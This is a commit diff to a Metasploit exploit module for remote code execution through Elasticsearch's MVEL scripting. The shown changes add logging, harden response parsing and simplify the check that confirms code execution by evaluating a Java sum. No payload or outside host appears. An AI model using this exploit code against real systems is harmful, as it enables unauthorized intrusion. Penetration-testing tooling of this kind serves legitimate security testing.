Land #4537, @wchen-r7's fix for #4098

modules/exploits/multi/elasticsearch/script_mvel_rce.rb

@@ -105,18 +105,28 @@ class Metasploit3 < Msf::Exploit::Remote
     sum = addend_one + addend_two
 
     java = java_sum([addend_one, addend_two])
+
+    vprint_status("#{peer} attempting to execute '#{java}' in Java")
     res = execute(java)
     result = parse_result(res)
 
     if result.nil?
+      vprint_status("#{peer} no response to executed Java")
       return false
     else
+      vprint_status("#{peer} response to executed Java: #{result}")
       result.to_i == sum
     end
   end
 
   def parse_result(res)
-    unless res && res.code == 200 && res.body
+    unless res
+      vprint_error("#{peer} no response")
+      return nil
+    end
+
+    unless res.code == 200 && res.body
+      vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
       return nil
     end
 
@@ -127,20 +137,16 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     begin
-      result = json['hits']['hits'][0]['fields']['msf_result'][0]
+      result = json['hits']['hits'][0]['fields']['msf_result']
     rescue
       return nil
     end
 
-    result
+    result.is_a?(::Array) ? result.first : result
   end
 
   def java_sum(summands)
-    source = <<-EOF
-#{summands.join(" + ")}
-    EOF
-
-    source
+    summands.join(' + ')
   end
 
   def to_java_byte_array(str)